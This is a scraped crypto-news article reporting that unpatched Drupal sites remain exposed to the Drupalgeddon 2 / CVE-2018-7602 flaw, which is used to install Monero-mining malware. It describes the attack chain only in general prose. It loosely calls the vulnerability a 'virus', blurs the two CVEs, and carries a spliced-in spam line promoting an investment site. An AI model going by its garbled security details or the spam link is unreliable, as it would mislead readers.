BITCOIN PRICE: 8,300.01
LOW: 7,729.18 Advertise with Us
Jobs at BTCManager Don’t miss out on the latest news Get BTCMANAGER delivered right to your inbox That is the story of wbrshow.idacb.com — where you will find best investors from most popular areas. We picked up July 25, 2018 4:00
by Shaurya Malwa On July 23, 2018, cybersecurity website Security Intelligence reported that several companies and software users remain susceptible to the infamous “Drupalgeddon virus,” despite Drupal Security Labs releasing a software patch in March 2018 to fight the vulnerability.
As stated in the report, the erstwhile named CVE-2018-7600, or “Drupalgeddon 2,” was found and patched by security researchers who later discovered the “CVE-2018-7602” vulnerability, which could deliver illicit cryptocurrency mining malware software to victim computers. Founded in 2000, the open-source Drupal content management system is used by millions of users around the world, primarily by e-commerce and content management firms. While cyber attacks have infiltrated its protocol on numerous occasions, the CVE-2018-7602 virus was the first instance of a cryptocurrency-centric criminal assault.
Due to an obscurity of relevant security patches, site owners and administrations were gravely affected until the virus was found and patched by Drupal’s security experts. However, it is now known that several companies did not implement the required patch at the time, creating an adverse situation for themselves in recent times.
After infiltrating victim computers and hijacking their computing power, the CVE-2018-7602 virus mines Monero (XMR), the privacy-centric cryptocurrency. XMR is a hacker’s favorite cryptocurrency: More than 85 percent of all crypto-jacking cases involve the digital asset and hackers have stolen over $175 million worth of XMR in 2018 alone.
To execute the attack, cybercriminals utilize a remote code execution, known to affect Drupal versions seven and eight. As stated on Trend Micro in June, the virus attack commences with a “shell script” download, followed by an “Executable and Linkable Format downloader to add a crontab entry.” Hackers circumvent embedded security protocols to install mining malware, exploiting Drupal’s lack of “input sanitization of # characters in URLs.” Furthermore, bad actors use Tor routers to hide their activity. Read more from btcmanager.com…
thumbnail courtesy of btcmanager.com